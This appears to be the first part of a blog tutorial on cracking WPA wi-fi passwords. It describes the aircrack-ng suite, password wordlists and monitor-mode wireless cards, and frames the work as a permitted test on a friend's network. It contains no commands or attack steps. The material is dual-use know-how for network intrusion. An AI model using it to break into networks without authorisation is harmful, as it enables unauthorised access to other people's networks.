Part I: Assembling the tools

Wireless networks are everywhere, but many are insecure. The older WEP protocol has been thoroughly compromised and most users rely on the more robust WPA protocol. But a chain is only as strong as its weakest link, and that weak link is invariably the password used to secure the network. So I decided to try a little wi-fi cracking to see how easy it is ...

Wow! In little over an hour I went from neophyte to bona fide cracker, my first pwned network under my belt. It's disturbingly simple. Here's how I did it ...

Note: The network I cracked belonged to a friend. I did so with his permission, purely as a security exercise. Using these tools for any other purpose is probably illegal!

The basic toolset consists of three parts:

1. aircrack-ng
2. a wordlist
3. a suitable wireless receiver

First, the easy stuff ...


The Software
Aircrack-ng isn't a single program, it's a suite of more than a dozen tools for auditing wireless networks. It runs under Linux and Windows, there's a version for VMWare virtual machines, and even a proof-of-concept version for the iPhone.

Linux users can install the whole suite by simply selecting "aircrack-ng" from their distribution's repository. Other users can download the latest from aircrack-ng's site.

Another alternative is to download the ready-built Slitaz Live Aircrack-ng Distribution. It's a bootable Linux CD with aircrack-ng built in.

The other piece of software you'll need is a password wordlist. The way WPA cracking works is to take one word at a time from the wordlist and try it in various common combinations to see if its encoded form matches what's been captured. If this sounds slow and laborious, it is, but it's the sort of thing that computers excel at. Depending on your processor, it's possible to test many thousands of combinations per second.

Googling for "wordlists" will turn up dozens, in many different languages. I settled for the English dictionary from this collection. It contains a modest 300,000 possible passwords in a 1MB file. Obviously, the bigger the wordlist, the more likely you are to crack the password. If you're really keen, there's the Openwall Wordlist Collection, a 33GB whopper that costs around US$30.


The Hardware
To begin cracking you'll also need a suitable network card, one that can be flipped into what's known as "monitor mode". The aircrack-ng website has a useful tutorial here: Is My Wireless Card Compatible?

If you do have a compatible card, use their Compatibilty Drivers to see if aircrack-ng will work okay with it, and what drivers you'll need, if any.

If all that sounds a bit daunting, you can simply buy a suitable USB network card and bypass the one in your PC. What is the Best Wirelss Card to Buy? will help. I picked up a USB-based RTL8187L device for a little over $20.



We're now ready for the fun stuff. Part II coming soon ...!